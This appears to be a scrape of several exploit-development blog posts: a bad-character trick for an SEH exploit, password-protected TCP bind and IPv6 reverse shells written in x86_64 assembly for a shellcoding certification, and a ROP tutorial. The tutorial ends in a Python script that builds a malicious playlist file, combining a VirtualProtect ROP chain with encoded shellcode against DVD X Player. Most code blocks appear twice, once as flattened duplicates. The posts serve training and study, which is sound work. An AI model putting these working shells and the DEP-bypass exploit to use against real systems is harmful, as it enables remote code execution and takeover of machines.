Bad Characters Sortilege

Introduction

In exploit development world there will be times where you find yourself working with an executable that enforces a very limited character set in which you can use to craft your shellcode. This rather short blog post will talk about how you can use bad characters to your advantage and ultimately produce otherwise prohibited instructions in your shellcode.

Synopsis

While prepping to take the OSCE course earlier this year, I discovered 0day in the register function across Flexense products, see the link EDB-ID: 44455. At the time Structured Exception Handler (SEH) subject was fairly new to me, let alone manual shellcoding. I struggled for days trying to figure out a way to beat this thing before deciding to craft proof of concept shellcode for WinExec() function for reasons that are irrelevant to this blog post. Typically the register function will only accept alphanumeric characters for obvious reasons and as such anything beyond \x7f character is considered bad, this includes pointers and instructions.

During the process of crafting the shellcode, I made sure to stay within the range of allowed characters but then reached a point where I needed JMP ESP instruction but couldn’t find a clean pointer that I can use. To overcome this issue I decided to pass previously identified bad characters to the program to see if any gets converted to an opcode that I could use (in this case was looking for RET instruction) and ultimately found that \xff end up as \xc3, bingo! So I manually encoded JMP ESP pointer by preforming arithmetic operations on EAX register and pushing it onto the stack.

At this point all we need really is place \xff at the end of the shellcode which will effectively pop previously pushed onto the stack JMP ESP pointer to EIP and execute it! The following is a demo of the exploit, please check the above exploit link for more details.

Final Thoughts

The main takeaway here is always look for ways to circumvent restrictions and don’t take bad characters for granted.. Hopefully this blog post will aid folks who run into similar situations or rather help them come up with more creative ways to solve the problem at hand. Lastly, feel free to correct any inaccurate information I may have provided using the comment section below or tweet me @ihack4falafel.

Password Protected TCP Reverse Shell (IPv6) | Linux x86_64

Introduction

In this post we will create a custom TCP reverse shell for Linux x86_64 architecture that requires password to spawn a shell. This post is a continuation of Password Protected TCP Bind Shell | Linux x86_64 and since my SLAE32 series include an in-depth analysis of the functions used in reverse shells we won’t spend too much time there.

Shellcode

I decided to create an IPv6 reverse shell this time around for two reasons, the first being I haven’t done any before! and the second is for some reason msfvenom don’t have one for x86_64 so the final shellcode could be of use to somebody, maybe.

➜  ~ msfvenom -l payloads | grep linux/x64
    linux/x64/exec                                      Execute an arbitrary command
    linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
    linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
    linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
    linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
    linux/x64/shell_find_port                           Spawn a shell on an established connection
    linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
➜  ~

➜ ~ msfvenom -l payloads | grep linux/x64

linux/x64/exec Execute an arbitrary command

linux/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection

linux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker

linux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)

linux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)

linux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)

linux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection

linux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker

linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell

linux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.

linux/x64/shell_find_port Spawn a shell on an established connection

linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell

➜ ~

Creating an IPv6 reverse shell is not rocket science, all we need is use AF_INET6 as domain when calling socket() function and use IPv6 structure to specify what IP and port we want amongst other things (I used localhost ::1 in this case). Lastly, we need to accommodate for the structure length when calling connect() function using RDX register.

Address format
           struct sockaddr_in6 {
               sa_family_t     sin6_family;   /* AF_INET6 */
               in_port_t       sin6_port;     /* port number */
               uint32_t        sin6_flowinfo; /* IPv6 flow information */
               struct in6_addr sin6_addr;     /* IPv6 address */
               uint32_t        sin6_scope_id; /* Scope ID (new in 2.4) */
           };

           struct in6_addr {
               unsigned char   s6_addr[16];   /* IPv6 address */
           };

Address format

struct sockaddr_in6 {

sa_family_t sin6_family; /* AF_INET6 */

in_port_t sin6_port; /* port number */

uint32_t sin6_flowinfo; /* IPv6 flow information */

struct in6_addr sin6_addr; /* IPv6 address */

uint32_t sin6_scope_id; /* Scope ID (new in 2.4) */

};

struct in6_addr {

unsigned char s6_addr[16]; /* IPv6 address */

};

The following is the final null-free shellcode. Please refer to the link of my previous post in the introduction section to learn more about read() function used in the password check routine.

section .text

global _start

_start:

	; int socket(int domain, int type, int protocol)
	; rax=41, rdi=10, rsi=1, rdx=0
	xor esi,esi
	mul esi                
	inc esi
	push 10 
	pop rdi
	add al, 41
	syscall

	; save socket fd in rdi
	xchg rbx,rax

	; struct sockaddr_in6 struct
	push rdx			            ; scope id = 0
	mov rcx,0xFEFFFFFFFFFFFFFF      ; link local address ::1
	not rcx
	push rcx
	push rdx
	push rdx                        ; sin6_flowinfo=0
	push word 0x3905		        ; port 1337
	push word 10     		        ; sin6_family

	; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
	; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)
	push 	rbx
	pop 	rdi
	push 	rsp
	pop 	rsi
	push 	28
	pop 	rdx
	push 	42
	pop 	rax
	syscall

	; dup2 (new, old)
	; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
	xchg   rsi, rax
	push 0x3
	pop rsi
_loop:
	push 0x21
	pop rax
	dec esi
	syscall
	loopnz _loop

	; read (int fd, void *bf, size_t count)
	; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
	xor rax, rax
	push rax
	pop rdi
	push rax
	push rsp
	pop rsi
	push 0x4
	pop rdx
	syscall

	; check passcode (pwnd)
	push 0x646e7770
	pop rbx
	cmp dword [rsi], ebx
	jne _nop

	; int execve(cont char *filename, char *const argv[], char *const envp[])
	; rax=59, rdi=/bin//sh, rsi=0, rdx=0
	xor rax, rax
	push rax
	mov rbx, 0x68732f2f6e69622f
	push rbx
	push rsp
	pop rdi
	push rax
	push rsp
	pop rsi
	cdq
	push 0x3b
	pop rax
	syscall

_nop:
	nop

section .text

global _start

_start:

; int socket(int domain, int type, int protocol)

; rax=41, rdi=10, rsi=1, rdx=0

xor esi,esi

mul esi

inc esi

push 10

pop rdi

add al, 41

syscall

; save socket fd in rdi

xchg rbx,rax

; struct sockaddr_in6 struct

push rdx ; scope id = 0

mov rcx,0xFEFFFFFFFFFFFFFF ; link local address ::1

not rcx

push rcx

push rdx

push rdx ; sin6_flowinfo=0

push word 0x3905 ; port 1337

push word 10 ; sin6_family

; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)

; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)

push rbx

pop rdi

push rsp

pop rsi

push 28

pop rdx

push 42

pop rax

syscall

; dup2 (new, old)

; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)

xchg rsi, rax

push 0x3

pop rsi

_loop:

push 0x21

pop rax

dec esi

syscall

loopnz _loop

; read (int fd, void *bf, size_t count)

; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)

xor rax, rax

push rax

pop rdi

push rax

push rsp

pop rsi

push 0x4

pop rdx

syscall

; check passcode (pwnd)

push 0x646e7770

pop rbx

cmp dword [rsi], ebx

jne _nop

; int execve(cont char *filename, char *const argv[], char *const envp[])

; rax=59, rdi=/bin//sh, rsi=0, rdx=0

xor rax, rax

push rax

mov rbx, 0x68732f2f6e69622f

push rbx

push rsp

pop rdi

push rax

push rsp

pop rsi

cdq

push 0x3b

pop rax

syscall

_nop:

nop

Now its demo time.

Closing Thoughts

I did learn a thing or two about IPv6 addressing while crafting this shellcode and I hope you did too. All of the above code is available on my github or exploit-db. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certiﬁcation:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579

Password Protected TCP Bind Shell | Linux x86_64

Introduction

In this post we will create a custom TCP bind shell for Linux x86_64 architecture that requires password to spawn a shell. We wont be going into too much details on how each function work as this has already been discussed in my previous Creating Custom TCP Reverse Shell | Linux x86 post.

Shellcode

If you’re not familiar with x86_64 assembly its pretty much the same as x86 from shellcoding standpoint. The following are the key add-ons (I should say) that you get when using x86_64 assembly as opposed to x86:

The registers hold twice as much as x86 ones (8 bytes).
You have 8 more registers (R8-R15).
The ability to craft position independent shellcode using Instruction Pointer Relative Addressing.

I used read() function to check for input via stdin and then compare it to a predefined password (in this case I used “pwnd”), if the check fails the shellcode will jump to “_nop” section which will effectivly cause the bind shell to crash. Please refer to the link in the introduction section for more in-depth analysis of the functions used by the bind shell. The following is the final null-free shellcode.

global _start

section .text

_start:

	; int socket(int domain, int type, int protocol)
	; rax=41, rdi=2, rsi=1, rdx=0
	xor esi,esi
	mul esi                
	inc esi
	push 2 
	pop rdi
	add al, 41
	syscall

	; save socket fd in rdi
	xchg   rdi,rax

	; setup sockaddr strcture (af_inet=2, port=1337, inaddr_any, 0)
     push 2
     mov word [rsp + 2], 0x3905
     push rsp      
     pop rsi

	; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
	; rax=49, rdi=fd, rsi=rsp, rdx=16
	push 0x31
	pop rax
	push rsp
	pop rsi
	push 0x10
	pop rdx
	syscall

	; int listen(int sockfd, int backlog)
	; rax=50, rdi=fd, rsi=who cares
	pop rsi
	push 0x32
	pop rax
	syscall

	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
	; rax=43, rdi=fd, rsi=rsp, rdx=16
	sub rsp, 0x10
	push rsp
	pop rsi
	push 0x2b
	pop rax
	push 0x10
	push rsp
	pop rdx
	syscall

	; store newly spawnd fd in r9
	xchg r9,rax

	; close parent socket
	xor rax, rax
	push 0x30
	pop rax
	syscall

	; dup2 (new, old)
	; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
	xchg   rdi,r9
	push 0x3
	pop rsi
_loop:
	push 0x21
	pop rax
	dec esi
	syscall
	loopnz _loop

	; read (int fd, void *bf, size_t count)
	; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
	xor rax, rax
	push rax
	pop rdi
	push rax
	push rsp
	pop rsi
	push 0x4
	pop rdx
	syscall

	; check passcode (pwnd)
	push 0x646e7770
	pop rbx
	cmp dword [rsi], ebx
	jne _nop

	; int execve(cont char *filename, char *const argv[], char *const envp[])
	; rax=59, rdi=*/bin//sh, rsi=0, rdx=0
	xor rax, rax
	push rax
	mov rbx, 0x68732f2f6e69622f
	push rbx
	push rsp
	pop rdi
	push rax
	push rsp
	pop rsi
	cdq
	push 0x3b
	pop rax
	syscall
	
_nop:
	nop

100

101

102

103

104

105

106

107

108

109

110

111

global _start

section .text

_start:

; int socket(int domain, int type, int protocol)

; rax=41, rdi=2, rsi=1, rdx=0

xor esi,esi

mul esi

inc esi

push 2

pop rdi

add al, 41

syscall

; save socket fd in rdi

xchg rdi,rax

; setup sockaddr strcture (af_inet=2, port=1337, inaddr_any, 0)

push 2

mov word [rsp + 2], 0x3905

push rsp

pop rsi

; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

; rax=49, rdi=fd, rsi=rsp, rdx=16

push 0x31

pop rax

push rsp

pop rsi

push 0x10

pop rdx

syscall

; int listen(int sockfd, int backlog)

; rax=50, rdi=fd, rsi=who cares

pop rsi

push 0x32

pop rax

syscall

; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)

; rax=43, rdi=fd, rsi=rsp, rdx=16

sub rsp, 0x10

push rsp

pop rsi

push 0x2b

pop rax

push 0x10

push rsp

pop rdx

syscall

; store newly spawnd fd in r9

xchg r9,rax

; close parent socket

xor rax, rax

push 0x30

pop rax

syscall

; dup2 (new, old)

; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)

xchg rdi,r9

push 0x3

pop rsi

_loop:

push 0x21

pop rax

dec esi

syscall

loopnz _loop

; read (int fd, void *bf, size_t count)

; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)

xor rax, rax

push rax

pop rdi

push rax

push rsp

pop rsi

push 0x4

pop rdx

syscall

; check passcode (pwnd)

push 0x646e7770

pop rbx

cmp dword [rsi], ebx

jne _nop

; int execve(cont char *filename, char *const argv[], char *const envp[])

; rax=59, rdi=*/bin//sh, rsi=0, rdx=0

xor rax, rax

push rax

mov rbx, 0x68732f2f6e69622f

push rbx

push rsp

pop rdi

push rax

push rsp

pop rsi

cdq

push 0x3b

pop rax

syscall

_nop:

nop

Now comes that fun part, let’s test out the shellcode.

Closing Thoughts

I feel passwords are essential when it comes to bind shells and hope this post will benefit folks looking to create one. All of the above code is available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel . This post is one of many to come so stay tuned!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certiﬁcation:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579

ROPing the Stack

Introduction

In efforts to learn as much as I can before starting OSCE later this month, I decided to write a blog post about Return Oriented Programming (ROP). ROP in its entirety is fairly new to me and as such this will be learning experience to me as much as it would be to you. Now If you would like a more in-depth overview of the subject I highly recommend reading Corelan Team tutorial, in fact most (if not all!) of what you will see in this blog post is based on information obtained while reading their exploit development series. Lastly, you need to be somewhat familiar with Buffer Overflows and have solid understanding of x86 Assembly before we continue.

ROP

At this point you might be asking yourself what is Return Oriented Programming and why on earth would I need it. Well, from a high-level point of view ROP is set of instruction(s) followed by return (also referred to as gadgets), meaning a given gadget executes and then the return instruction kicks in redirecting the flow of execution to the next gadget inline thus giving us the opportunity to chain multiple commands together to achieve a meaningful function also known as ROP chain (see the figure below).

The reason you would need to construct a ROP chain is something called Data Execution Prevention (DEP), without going into too much details DEP is a system-level memory protection feature that is built into the operating system starting with Windows XP and Windows Server 2003. DEP enables the system to mark one or more pages of memory as non-executable. Marking memory regions as non-executable means that code cannot be run from that region of memory, which makes it harder for the exploitation of Buffer Overflows, for more information on DEP do check this wiki.

In nutshell if DEP is enabled placing your shellcode on the stack via saved return pointer (EIP) or Structured Exception Handling (SEH) record overwrite won’t do the trick and as such you would need to somehow find memory addresses that point to command snippets followed by return instruction in the target program and then place them strategically on the stack to call/execute a function. Now keep in mind your limited by the functions (APIs) used in the program you’re trying to exploit, also you need to account for things like bad characters, SEHOP, and ASLR.

Depending on the situation at hand you can use ROP chains to either call functions like WinExec() to say add user or execute bind shell or use functions that disable DEP by marking region of stack, heap, or the entire process executable. See the table below (used MSDN as reference):

Based on my little experience with ROP gadgets, I’ve noticed that you would run into VritualProtect() and/or VirtualAlloc() calls more often than the other APIs and as such the following section will focus on abusing VritualProtect() to bypass Data Execution Prevention. Below is what you need in order to follow along:

Windows 7 Service Pack 1 (x86) Build 7601
DVD X Player 5.5 Professional
Immunity Debugger
Mona.py
Absolut Vodka

VirtualProtect()

In essence, VirtualProtect() changes the protection options i. e. the way application is allowed to access some memory region already allocated by VirtualAlloc() or other memory functions. I’ve made table of required arguemnts based on information from MSDN.

First things first we need to fire up Immunity Debugger and setup working folder for logging.

Obviously I’ve done this prior to taking the above screenshot hence the old value. At this point I’m going to assume you know how DVD X Player exploit found in EDB-ID: 17745 work and for that reason will skip this part. The next step is to see what ROP functions are available to us in order to bypass DEP.

As you can see the search was limited to application DLLs that don’t have memory protections such as ASLR and SafeSEH turned on and excluded addresses that contain bad characters. Again, I assume you know how to identify bad characters otherwise I suggest this excellent read here. The screenshot shows mona.py found a total of 48 pointers (3 of which are VirtualProtect()) and the results were written to ropfunc.txt. Let’s overrun the saved return pointer and examine the stack at that point using the following skeleton exploit.

#!/usr/bin/env python

buffer  = "\x41" * 260                      # eip offset
buffer += "\x42" * 4
buffer += "\x43" * (1500-260-4)

try:
	f=open("OpenMe.plf","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created. Load that shit up!"
except:
	print "File cannot be created"

#!/usr/bin/env python

buffer = "\x41" * 260 # eip offset

buffer += "\x42" * 4

buffer += "\x43" * (1500-260-4)

try:

f=open("OpenMe.plf","w")

print "[+] Creating %s bytes evil payload.." %len(buffer)

f.write(buffer)

f.close()

print "[+] File created. Load that shit up!"

except:

print "File cannot be created"

Attach DVD X Player to Immunity Debugger and load OpenMe.plf.

Looking at the stack, ESP points to (0x0012F428) that’s 16 bytes from EIP which makes it fairly easy to pivot from EIP back to the stack (we want to place our ROP chain pointers on the stack, remember?). Now we need to find an instruction that will tell EIP to jump to where ESP is pointing and to do that we need to first generate list of universal ROP gadgets with no bad characters.

The above command will output number of files for various purposes but we’re only interested in two, rop_chains.txt which takes care of pairing registers with arguments for VirtualProtect() and VirtualAlloc() along with their corresponding ROP gadgets, now how cool is that?! The second file is rop.txt which contain every possible ROP gadget we can use. See VirtualProtect() register setup snippet taken from rop_chains.txt.

################################################################################

Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = ptr to &VirtualProtect()
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x6033447a,  # POP EAX # RETN [Configuration.dll] 
      0x60366238,  # ptr to &VirtualProtect() [IAT Configuration.dll]
      0x616306ed,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] 
      0x60366449,  # XCHG EAX,ESI # RETN [Configuration.dll] 
      0x60324e9b,  # POP EBP # RETN [Configuration.dll] 
      0x6035453b,  # & push esp # ret 0x10 [Configuration.dll]
      0x60332d5e,  # POP EAX # RETN [Configuration.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x60352df7,  # NEG EAX # RETN [Configuration.dll] 
      0x6410b090,  # XCHG EAX,EBX # RETN [NetReg.dll] 
      0x603343c6,  # POP EAX # RETN [Configuration.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x61627d9c,  # NEG EAX # RETN [EPG.dll] 
      0x61608ba2,  # XCHG EAX,EDX # RETN [EPG.dll] 
      0x6401a604,  # POP ECX # RETN [MediaPlayerCtrl.dll] 
      0x6411efff,  # &Writable location [NetReg.dll]
      0x60334af6,  # POP EDI # RETN [Configuration.dll] 
      0x64041804,  # RETN (ROP NOP) [MediaPlayerCtrl.dll]
      0x6403c046,  # POP EAX # RETN [MediaPlayerCtrl.dll] 
      0x90909090,  # nop
      0x6031c1ce,  # PUSHAD # RETN [Configuration.dll]

################################################################################

--------------------------------------------

EAX = NOP (0x90909090)

ECX = lpOldProtect (ptr to W address)

EDX = NewProtect (0x40)

EBX = dwSize

ESP = lPAddress (automatic)

EBP = ReturnTo (ptr to jmp esp)

ESI = ptr to VirtualProtect()

EDI = ROP NOP (RETN)

--- alternative chain ---

EAX = ptr to &VirtualProtect()

ECX = lpOldProtect (ptr to W address)

EDX = NewProtect (0x40)

EBX = dwSize

ESP = lPAddress (automatic)

EBP = POP (skip 4 bytes)

ESI = ptr to JMP [EAX]

EDI = ROP NOP (RETN)

+ place ptr to "jmp esp" on stack, below PUSHAD

--------------------------------------------

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

----------------------------------------------------------

*** [ Ruby ] ***

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be

rop_gadgets =

[

0x6033447a, # POP EAX # RETN [Configuration.dll]

0x60366238, # ptr to &VirtualProtect() [IAT Configuration.dll]

0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]

0x60366449, # XCHG EAX,ESI # RETN [Configuration.dll]

0x60324e9b, # POP EBP # RETN [Configuration.dll]

0x6035453b, # & push esp # ret 0x10 [Configuration.dll]

0x60332d5e, # POP EAX # RETN [Configuration.dll]

0xfffffdff, # Value to negate, will become 0x00000201

0x60352df7, # NEG EAX # RETN [Configuration.dll]

0x6410b090, # XCHG EAX,EBX # RETN [NetReg.dll]

0x603343c6, # POP EAX # RETN [Configuration.dll]

0xffffffc0, # Value to negate, will become 0x00000040

0x61627d9c, # NEG EAX # RETN [EPG.dll]

0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]

0x6401a604, # POP ECX # RETN [MediaPlayerCtrl.dll]

0x6411efff, # &Writable location [NetReg.dll]

0x60334af6, # POP EDI # RETN [Configuration.dll]

0x64041804, # RETN (ROP NOP) [MediaPlayerCtrl.dll]

0x6403c046, # POP EAX # RETN [MediaPlayerCtrl.dll]

0x90909090, # nop

0x6031c1ce, # PUSHAD # RETN [Configuration.dll]

Notice how the ROP gadgets were placed in prefect order to make sure registers have the intended values by the time PUSHAD gets executed. Although there are two ways you could go about setting up your ROP chain we’ll go with the first option.

NEG instruction was also used to allow the placement of negative values for NewProtect and dwSize onto the stack in order to avoid null bytes. For instance NewProtect needs value of (0x00000040) to mark the memory region where our shellcode lives as executable (PAGE_EXECUTE_READWRITE), right? so to overcome the issue (0xffffffc0) was put instead and then NEG was used to convert it back to 0x40.

Now remember we still need to compensate for the 16 bytes gab between EIP and where ESP is pointing to, will use filler for that. I also did change dwSize value to (0x00000501) to allow for more space and swapped some of the pointers with ASCII print friendly ones as you can see in the final exploit.

#!/usr/bin/env python

import struct
import time

# bad characters "\x00\x0a\x0d\x1a\x20"

shellcode  = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"

buffer  = "\x41" * 260                      # eip offset

#----------------------------------------#
# ROP Chain setup for VirtualProtect()   #
#----------------------------------------#
# EAX = NOP (0x90909090)                 #
# ECX = lpOldProtect (ptr to W address)  #
# EDX = NewProtect (0x40)                #
# EBX = dwSize                           #
# ESP = lPAddress (automatic)            #
# EBP = ReturnTo (ptr to jmp esp)        # 
# ESI = ptr to VirtualProtect()          #
# EDI = ROP NOP (RETN)                   # 
#----------------------------------------#
 
buffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll] 
buffer += "MMMM"                             # compensate (filler)
buffer += "MMMM"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += struct.pack('<L', 0x60366238)      # ptr to &VirtualProtect() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll] 
buffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll] 
buffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x603636a4)      # POP ECX # RETN [Configuration.dll] 
buffer += struct.pack('<L', 0x6411cdfc)      # &Writable location [NetReg.dll]
buffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll] 
buffer += struct.pack('<L', 0x90909090)      # NOP
buffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]
 
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))

try:
	f=open("OpenMe.plf","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	time.sleep(1)
	f.write(buffer)
	f.close()
	print "[+] File created. Load that shit up!"
except:
	print "File cannot be created"

#!/usr/bin/env python

import struct

import time

# bad characters "\x00\x0a\x0d\x1a\x20"

shellcode = ""

shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"

shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"

shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"

shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"

shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"

shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"

shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"

shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"

shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"

shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"

shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"

shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"

shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"

shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"

shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"

shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"

shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"

buffer = "\x41" * 260 # eip offset

#----------------------------------------#

# ROP Chain setup for VirtualProtect() #

#----------------------------------------#

# EAX = NOP (0x90909090) #

# ECX = lpOldProtect (ptr to W address) #

# EDX = NewProtect (0x40) #

# EBX = dwSize #

# ESP = lPAddress (automatic) #

# EBP = ReturnTo (ptr to jmp esp) #

# ESI = ptr to VirtualProtect() #

# EDI = ROP NOP (RETN) #

#----------------------------------------#

buffer += struct.pack('<L', 0x6033cda2) # POP EAX # RETN [Configuration.dll]

buffer += "MMMM" # compensate (filler)

buffer += "WWWW" # compensate (filler)

